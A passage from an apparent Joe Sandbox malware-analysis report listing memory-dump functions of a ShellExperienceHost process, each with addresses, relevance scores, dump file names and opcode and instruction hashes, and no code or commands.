Instruction Fuzzy Hash: 7611AC7184E6895FEB06AB6098291A9BBA0AF16304F0601FBD00ACB0E3EA396545C361

Function 00007FF848F54BF5 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73afe6e2134ad87cf6d2a1fea3ce905c432191f4a8272850e50778b60e08e6eb
Instruction ID: 29e6940e0784020f77cf4807b818dee2bc3798d6f6fdb6a8babf2ea0ce1d90c1
Opcode Fuzzy Hash: 73afe6e2134ad87cf6d2a1fea3ce905c432191f4a8272850e50778b60e08e6eb
Instruction Fuzzy Hash: AD116D7080DA4A9FDB49EB6884692BDBAA0FFA8341F1405BED419C6192DB39A480C741

Function 00007FF848F528E1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e964d1a2e6c435e130496565ff9c34c507948659323575ff8eaa68470acee15
Instruction ID: 7f834b5cb1ec523244884d629a77503982e39dd3143a2b9ad8d7ec7ac8726a25
Opcode Fuzzy Hash: 4e964d1a2e6c435e130496565ff9c34c507948659323575ff8eaa68470acee15
Instruction Fuzzy Hash: 1D117C719086898FDB49EF54C4965E97BE1FF68355F1102BEE80AC3292DB34A540CB85

Function 00007FF848F571C5 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 429a4f19014301ab01ff7addc63691ca3852805344f6eaa5fbc0e6c2aa4823a9
Instruction ID: 1f97f5a0b57e23bc88969a56dc0864b9c329d2c6992d1c0fccef3327c0e55f05
Opcode Fuzzy Hash: 429a4f19014301ab01ff7addc63691ca3852805344f6eaa5fbc0e6c2aa4823a9
Instruction Fuzzy Hash: CE11CA3080CA4E8FEB89EF2884592BDBBE0FF28341F0005BED409C21D2DB38A480CB55

Function 00007FF848F57265 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3ffbe66ee4ca536fe6b5c124a63acfcc6ad12c902bd5384ec08d22fdfb3c01
Instruction ID: 9575e461dcc7ec4a8aa30d1967d1940d22cb01f473327b56f69e3a46e234c143
Opcode Fuzzy Hash: fb3ffbe66ee4ca536fe6b5c124a63acfcc6ad12c902bd5384ec08d22fdfb3c01
Instruction Fuzzy Hash: C911B231D0DA4A8FEB59EB24845A2B8BBE0FF26340F0404BEE40DC25D3DF296445CB69

Function 00007FF848F55095 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7f48cb5aecb44a9a08a2f6cb2bd89f18ee4e4dcbe0fa6ba12f76c1db112ed59
Instruction ID: 5cf5c18f63e5e434f0c47af34dfa6f44a12ebed30e3301f987ebaa600c1cd42b
Opcode Fuzzy Hash: d7f48cb5aecb44a9a08a2f6cb2bd89f18ee4e4dcbe0fa6ba12f76c1db112ed59
Instruction Fuzzy Hash: 5C11EF31D0DA8A8FEB99EB2498AA2B8BBA0FF19300F1400FEC00DC34D3DB296444C345

Function 00007FF848F4CE60 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec372ad952e5addbb4616dd89515bef45b657860fcc8953fe0e99af65cff80d5
Instruction ID: eb5b331f03da6bdaaeec752bb311e02eb9a7698c9337a0b98294422b6e38668e
Opcode Fuzzy Hash: ec372ad952e5addbb4616dd89515bef45b657860fcc8953fe0e99af65cff80d5
Instruction Fuzzy Hash: 25118C3180DA8E8EEB96FB2884582B97BB0FF2A741F0406BBD419D71D2EF356944C754

Function 00007FF848F54B59 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521feec7e638cd362ae01fee6d8746d6db2dd7058b680c74a511bc878786fcdd
Instruction ID: c01246aca00e59bc065b2ad07ffa7c077bdec4df1986e3a20a4c9721a75ea4fc
Opcode Fuzzy Hash: 521feec7e638cd362ae01fee6d8746d6db2dd7058b680c74a511bc878786fcdd
Instruction Fuzzy Hash: 4821AF7090DA9E9FDB89EF2884592B9BBA0FF69341F0405BBD409C75D2DB38A544C741

Function 00007FF848F4CDD7 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b97a90c5753c7d8b2b7865bff274b073be425fc646dd92177055f030e831caa
Instruction ID: 0e8fd41c8325c845abf49f68b83bbefbcb7d3393ab902d72f39205aaa77520f0
Opcode Fuzzy Hash: 7b97a90c5753c7d8b2b7865bff274b073be425fc646dd92177055f030e831caa
Instruction Fuzzy Hash: 8E11E03190D79E8EEB56BF6898141FA7BB0FF12A54F0002BBE958DB1E2EB345404C784

Function 00007FF848F55409 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6d256546d9e163ea11adf18168db2e4976c6dea118b681e3492f53d9cdf430
Instruction ID: 8d57b0b7919f365971048030f39fc193bc29d4ffab8e425f817effb363d6f54e
Opcode Fuzzy Hash: 6d6d256546d9e163ea11adf18168db2e4976c6dea118b681e3492f53d9cdf430
Instruction Fuzzy Hash: 7F11603190DA8A9FEB85EB24C8692B9BBE0FF19342F0405BBD419C65D3DB386554C711

Function 00007FF848F52CD1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e37f0cbc34c8e12b7a6859210548bcba7be4a79a58f641e9ce7f9fa78a1e7b8
Instruction ID: 0a1441cca6e8f409c4fedf7e2971a8270ad96eaf738cc440f5a05fc02e67c0a1
Opcode Fuzzy Hash: 2e37f0cbc34c8e12b7a6859210548bcba7be4a79a58f641e9ce7f9fa78a1e7b8
Instruction Fuzzy Hash: 9311613080D54E5FEB42FB64848C5F9BBE0FF59341F1449B6D408C7096EB7495858745

Function 00007FF848F434E1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f65fcf2c328891f15d5ca547f48dc1e432376a3b1cbf7adbb63d2bfea7d0d27
Instruction ID: 35c29c5ee01b8106684c6449756c9d0a1eb65f0f211c57212bdf84e7ca80818e
Opcode Fuzzy Hash: 8f65fcf2c328891f15d5ca547f48dc1e432376a3b1cbf7adbb63d2bfea7d0d27
Instruction Fuzzy Hash: 48113C7090868E8FDB49EB6888596BA7BA0FF28741F0405BAD419D61D1DB35A5408B04

Function 00007FF848F512B1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281719bd73ef25229276bc92d99712f20623ca1d15bd228d0f24f4df01c1eb95
Instruction ID: d814ec644f3af4233eea0a24eeeefe1bc74e899846f2182743da92024731faae
Opcode Fuzzy Hash: 281719bd73ef25229276bc92d99712f20623ca1d15bd228d0f24f4df01c1eb95
Instruction Fuzzy Hash: 37118E3090D64D8FEB44EB2884692B9BBE0FF28345F4004BAD419C21D2EB34A580C740

Function 00007FF848F572FD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8527eabcf22cf9e8fe224e88eaa2456bbd1eb11ee08b01aff27282d985717d23
Instruction ID: 0136257f14da1909af9af8bdba6f76c98509e4f59d8ca82bbee3acdebaaf62ca
Opcode Fuzzy Hash: 8527eabcf22cf9e8fe224e88eaa2456bbd1eb11ee08b01aff27282d985717d23
Instruction Fuzzy Hash: 6F11C17090DA8E8FEB59EF24845A2BABBA0FF68350F0441BED809C61D3DB39A444C745

Function 00007FF848F57851 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5a968fbec4cb2d87b0fc4f76c096f922238228a83aa4108a62bf5322e339fc
Instruction ID: 96c2c045bee0417b339403bc5e35cd74cbc99664736ceb9a951587178f26b97a
Opcode Fuzzy Hash: ad5a968fbec4cb2d87b0fc4f76c096f922238228a83aa4108a62bf5322e339fc
Instruction Fuzzy Hash: C8115E3090D94A9FE741FB6888896AABBF4FF1A342F2404B6D419C7192DB38A544C755

Function 00007FF848F551BD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924d1ba2192c7e6e70593aacda8219ce5e2494de02cd6ad2ddef1c8fc5fe1356
Instruction ID: a01f395f9b28ef9ce22c52784b724e2465e1db9c925cd446f64b9f0863410233
Opcode Fuzzy Hash: 924d1ba2192c7e6e70593aacda8219ce5e2494de02cd6ad2ddef1c8fc5fe1356
Instruction Fuzzy Hash: 6E118C70C0D68E8FEB89EB2488592BEBBA0FF19340F1405BAD41AD71D2DB39A544C711

Function 00007FF848F54EE5 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc36e81466d17c27e995a02c9ebec280c629f4875c563b351a09e78737c5174
Instruction ID: 83e9741b5756f305bee933d937c9af4504918a921f46ba15a9f7a3cb0f7fb05b
Opcode Fuzzy Hash: 3dc36e81466d17c27e995a02c9ebec280c629f4875c563b351a09e78737c5174
Instruction Fuzzy Hash: 4611AC70D0DA9A9FE791FB68884D6B9BAE0FF29340F0404B6C41CC7096EB38A5808741

Function 00007FF848F564A9 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b587219d6fe902b283b54ec376978b6b496e7ce1e8490f93bc6030a6463fbede
Instruction ID: 792de11cd5849bcf28554cefd055eed244f925adac1da54f1edf38b7f8699519
Opcode Fuzzy Hash: b587219d6fe902b283b54ec376978b6b496e7ce1e8490f93bc6030a6463fbede
Instruction Fuzzy Hash: 81118C70C0D68A9FE782FB2888592B9BBF0FF19380F0404B6C458C71A7EF38A4948745

Function 00007FF848F4BEF5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b812579a5e3ca80640d55e24a6587b3a6e527c012a04e6b32b89925597ab46df
Instruction ID: 908d3af1e7f4051479a1601df129b7bd7a7878ee1ee3b8f2face2d4a17a94e19
Opcode Fuzzy Hash: b812579a5e3ca80640d55e24a6587b3a6e527c012a04e6b32b89925597ab46df
Instruction Fuzzy Hash: 35019E7082C64E8FE741FFA488491E97BE0FF28751F0545B6D40CD71E2EB34A4848B04

Function 00007FF848F5537D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc04246c1934d06892fe03c6b1b6d0449e762a4ee968c29aea4a5c54083cebc9
Instruction ID: 3fadcfd072a1627f7dd336eb6b4f89accad59274b237f6eb51dffae071ff3d44
Opcode Fuzzy Hash: dc04246c1934d06892fe03c6b1b6d0449e762a4ee968c29aea4a5c54083cebc9
Instruction Fuzzy Hash: 57118C3180DA8A9FEB49EB2488596B9BBE1FF18344F0404BAD41EC61D3DB69A544C701

Function 00007FF848F42E81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ce0f5b9ecc5b7af8730f164cefa25a21b68bed38a7e13d8741cfe89d8cca2f
Instruction ID: 0d079a3077383da10e8e79e58c634a24750adbb8153e4adbfea343b7242fd7a6
Opcode Fuzzy Hash: 76ce0f5b9ecc5b7af8730f164cefa25a21b68bed38a7e13d8741cfe89d8cca2f
Instruction Fuzzy Hash: 1D01783091D68E8FE751FBA888886A97BE0FF69781F0544B7D40CD70A2EB38E4848704

Function 00007FF848F52771 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2255c56807f7de8d57f1cd7aedd5eb7ed53ab2d15008e30f6aa6297ad016e8d
Instruction ID: 212074dd6a883fb734a5e20dea5ce988cfc29d7b762e7be5beb0bb2e9addaa0b
Opcode Fuzzy Hash: d2255c56807f7de8d57f1cd7aedd5eb7ed53ab2d15008e30f6aa6297ad016e8d
Instruction Fuzzy Hash: B001F13080D28A4FDB49EB64C4682BEBBA0FF19300F1505BEE00AC60D3EF35A540C740

Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eafdbb9d7291fdcba86556cd25559ec4a76b41b90e9ab880f481d177fbeecc6
Instruction ID: 1b263773aead95f1773e1d1b1c69d7f1a13ad46d3cc37fde0f2337a702cf6140
Opcode Fuzzy Hash: 1eafdbb9d7291fdcba86556cd25559ec4a76b41b90e9ab880f481d177fbeecc6
Instruction Fuzzy Hash: CE015E30908A1E9FEB48EF64C4596BAB7A1FF68345F50447ED40EE21D1DB36A590CB44

Function 00007FF848F4C15A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe966b31ed16e066358285d007dbb6b196cdaa5c8a717249499be84eb91c0443
Instruction ID: 7913ee3552bfe26bac69913997be214c4a9d6f157116d8e034fbba150929c3d8
Opcode Fuzzy Hash: fe966b31ed16e066358285d007dbb6b196cdaa5c8a717249499be84eb91c0443
Instruction Fuzzy Hash: 8101883081890E9EEB88FF6884582BDBAE0FF68301F10097BD41AE2191EB31A250C704

Function 00007FF848F4285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d55ee85595effa505d362f5b708644a19881816f55c356a851e98ae21f8350dc
Instruction ID: 60bb984c6805f7f0e2e5389b7aa28f9ddeb702d1af9e72f6d3fcdcfab4931b51
Opcode Fuzzy Hash: d55ee85595effa505d362f5b708644a19881816f55c356a851e98ae21f8350dc
Instruction Fuzzy Hash: 9401783090D64E8FE791BBA884896AD7BE0FF69741F5545B7E408D61A2EF38E0408704

Function 00007FF848F579D9 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c7d38f775176721b023a52eff0d17a02b9bafd18dafcbeb919ec80892907d7
Instruction ID: 3928b5177edabfd61e22af33d7d2f2390d50ca36e64d38dbf2aae16427d48490
Opcode Fuzzy Hash: 45c7d38f775176721b023a52eff0d17a02b9bafd18dafcbeb919ec80892907d7
Instruction Fuzzy Hash: EE018F3185DA8A5FE752BB3888995A9BBE0FF19341F4508B2D408C70E3EF28E5448719

Function 00007FF848F42EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fce5b84b3b9b2d8c86110e5b39045aef6a3a5ac473329e3714d93939dfce39
Instruction ID: fa7b818248ca8326bc2d37ee1f95c27e0ad185cf06aca0dbd0c03c4222a1e5f0
Opcode Fuzzy Hash: f6fce5b84b3b9b2d8c86110e5b39045aef6a3a5ac473329e3714d93939dfce39
Instruction Fuzzy Hash: DF01BC3091D2898FE742BB7488591A97BE0EF2A350F4A04F7C408CB0E6EB38A484C711

Function 00007FF848F41CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf9c35ebff97a340098afaaf2f024a6639ec55477f23fe01f27c63c81f3701c
Instruction ID: 164ebf592440f04d7ec17dd5a519a41eda0b7ebe00083982f7160323648e5476
Opcode Fuzzy Hash: 1bf9c35ebff97a340098afaaf2f024a6639ec55477f23fe01f27c63c81f3701c
Instruction Fuzzy Hash: 9001DC3080D69E8FEB98EF2488592FA7BA0FF65701F4000BAE808D21C2DB36D490C744

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1879695a52c29b51dc5d0ec4207dd1baf0a829025498d2cb3f17bb82bfa81b
Instruction ID: e5423c8c3a54727414ce605a7bb861ab510db4f2d34add054c46345b10cf3683
Opcode Fuzzy Hash: 4b1879695a52c29b51dc5d0ec4207dd1baf0a829025498d2cb3f17bb82bfa81b
Instruction Fuzzy Hash: D2016930819A0E9EEB49FB64C4582BA76A2FF28745F20087EE41ED21D1DF35A590CA04

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e708b0dab89ff3e37c9e3f02b54d8a348631ab1274c2c6e72168807468959765
Instruction ID: 3ebefb3c689bfc048a8ca2001d9895426b82d7298c2502bc38056c5e0dd1583f
Opcode Fuzzy Hash: e708b0dab89ff3e37c9e3f02b54d8a348631ab1274c2c6e72168807468959765
Instruction Fuzzy Hash: BC016D30819A0E9FEB49EB6484582BD76A0FF28745F20087FD40ED21D1DF39A550C614

Function 00007FF848F57BA0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610c0e24363747e512c9196676b00ae39ea590edeb9f5b6547d6ae3d16c314ca
Instruction ID: 0299a4d78486ba8b0dbc9387d880289d32764251c3f88115538bf1b1756fdf83
Opcode Fuzzy Hash: 610c0e24363747e512c9196676b00ae39ea590edeb9f5b6547d6ae3d16c314ca
Instruction Fuzzy Hash: 8511EE70D0861A9FEB28AF95D4943FCBBB0EF18361F54413AE019B22C2DB786485CF19

Function 00007FF848F4AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083a24423b7770465bf9710d41199f0000345b7068d941e8d943144e1b4db1d1
Instruction ID: 1d300c775ef36c32c35411d146ba4db59b973d1c2456c0fe29b96e60e15a75e4
Opcode Fuzzy Hash: 083a24423b7770465bf9710d41199f0000345b7068d941e8d943144e1b4db1d1
Instruction Fuzzy Hash: B0F0A97085C90E9FEB41FB3884495BABAE0EF28750F0508B3E40CD60A2EF34A0908604

Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e78ec1b72778073c792efa4846f480923d865b03a5bd3aefb7a2c0c6dd6046
Instruction ID: b38eb653895dd2d73409f27e3ef9504a8d2c069b2a8e15372d87aebed8189229
Opcode Fuzzy Hash: f3e78ec1b72778073c792efa4846f480923d865b03a5bd3aefb7a2c0c6dd6046
Instruction Fuzzy Hash: 1EF0623081D65E8FEB45EF6498152FA77A4FF25349F50047AE80DD21C1DB35A590C748

Function 00007FF848F42779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8746957e7668f2e4c986779aa389899007f6effe31606be1aea4eea9c039b88f
Instruction ID: d960c0b994f96179f5d1332f72d8e02f63b9fe528395ffcd75490ffa93590961
Opcode Fuzzy Hash: 8746957e7668f2e4c986779aa389899007f6effe31606be1aea4eea9c039b88f
Instruction Fuzzy Hash: 64F0A93180E38A8FEB5AAB2488182A93FA1FF26745F5504BBE409C60D2EB38A454C741

Function 00007FF848F40FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02912963b4a8ed20dc3605ef743fd6d4c3805e51406a3fb105064dd83b573af3
Instruction ID: 81348cd24771884a30ece6f821999ff7808c1ef0188e0b5bd95dc8790ac3cd90
Opcode Fuzzy Hash: 02912963b4a8ed20dc3605ef743fd6d4c3805e51406a3fb105064dd83b573af3
Instruction Fuzzy Hash: 8801D630D096198FEB90FB64C8447ADB7B0EF64741F1042AAD809F7292DF3869848B58

Function 00007FF848F512D0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be75f6288b9c85b525ef840ce18bbac1fdeb5e90570e5447c43a8d41c0993f6f
Instruction ID: 5cc3da8fcd8c8bc5d132f05750a4e49c866c32a92d7a3738a47ada98a63012d8
Opcode Fuzzy Hash: be75f6288b9c85b525ef840ce18bbac1fdeb5e90570e5447c43a8d41c0993f6f
Instruction Fuzzy Hash: 15F0FE3095864E8EEB94EF6898192FEB6E4FF18305F40053AE81DD2191EB746594C785

Function 00007FF848F4BC41 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
